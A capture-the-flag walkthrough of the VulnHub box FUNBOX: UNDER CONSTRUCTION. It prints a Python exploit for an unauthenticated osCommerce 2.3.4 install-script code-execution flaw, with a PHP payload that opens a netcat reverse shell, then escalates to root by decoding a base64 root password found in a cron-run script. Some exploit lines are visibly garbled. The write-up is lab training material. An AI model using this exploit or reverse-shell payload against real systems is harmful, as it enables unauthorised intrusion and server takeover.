This will also be brief. It’s FUNBOX: UNDER CONSTRUCTION! from VulnHub:
As always, it’s a very easy box for beginners.
This one has SSH, HTTP and various mail ports - for SMTP, POP3 and IMAP. We’re interested in the web stuff.
At we find osCommerce Online Merchant v2.3.4.1 which has various exploits. We can grab an unauthenticated RCE exploit from searchsploit and edit it:
# Exploit Title: osCommerce Remote Code Execution
# Date:
# Exploit Author: Simon Scannell - <[email protected]>
# Version:, 2.3.4 - Other versions have not been tested but are likely to be vulnerable
# Tested on: Linux, Windows
# If an Admin has not removed the /install/ directory as advised from an osCommerce installation, it is possible
# for an unauthenticated attacker to reinstall the page. The installation of osCommerce does not check if the page
# is already installed and does not attempt to do any authentication. It is possible for an attacker to directly
# execute the "install_4.php" script, which will create the config file for the installation. It is possible to inject
# PHP code into the config file and then simply executing the code by opening it.
import requests
# enter the the target url here, as well as the url to the install.php (Do NOT remove the ?step=4)
base_url = ""
target_url = ""
data = {
# the payload will be injected into the configuration file via this code
# ' define(\'DB_DATABASE\', \'' . trim($HTTP_POST_VARS['DB_DATABASE']) . '\');' . "\n" .
# so the format for the exploit will be: '); PAYLOAD; /*
payload = '\');'
payload += 'system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1234 >/tmp/f");' # this is where you enter you PHP payload
payload += '/*'
data['DB_DATABASE'] = payload
# exploit it
r =, data=data)
if r.status_code == 200:
print("[+] Successfully launched the exploit. Open the following URL to execute your code\n\n" + base_url + "install/includes/configure.php")
print("[-] Exploit did not execute as planned")
Note the above has been modified for the correct URLs and it sends me a reverse shell, like so:
└─# nc -nvlp 1234
listening on [any] 1234 ...
connect to [] from (UNKNOWN) [] 33868
/bin/sh: 0: cant access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash");'
I’m going to explain this slightly backwards. There is a cronjob running as the user Joe:
root@funbox10:/var/spool/cron/crontabs# cat joe
cat joe
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/crontab.wWLDXL/crontab installed on Mon Jul 19 13:24:20 2021)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
# Edit this file to introduce tasks to be run by cron.
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
# For more information see the manual pages of crontab(5) and cron(8)
# m h dom mon dow command
*/1 * * * * /usr/share/doc/examples/
Which is calling a shell script we can read:
www-data@funbox10:/$ cat /usr/share/doc/examples/
cat /usr/share/doc/examples/
# sample file
# 0 20 * * * /bin/goahead --parameter: LXUgcm9vdCAtcCByZnZiZ3QhIQ==
And that file contains the root password base64 encoded:
www-data@funbox10:/$ echo LXUgcm9vdCAtcCByZnZiZ3QhIQ== | base64 -d
echo LXUgcm9vdCAtcCByZnZiZ3QhIQ== | base64 -d
-u root -p rfvbgt!!www-data@funbox10:/$ su root
su root
Password: rfvbgt!!
root@funbox10:/# id;hostname;date
uid=0(root) gid=0(root) groups=0(root)
Sun Aug 1 12:14:04 CEST 2021
How did we know this? Pspy can find it, although it seems a bit flaky. Anyhoo, we move on….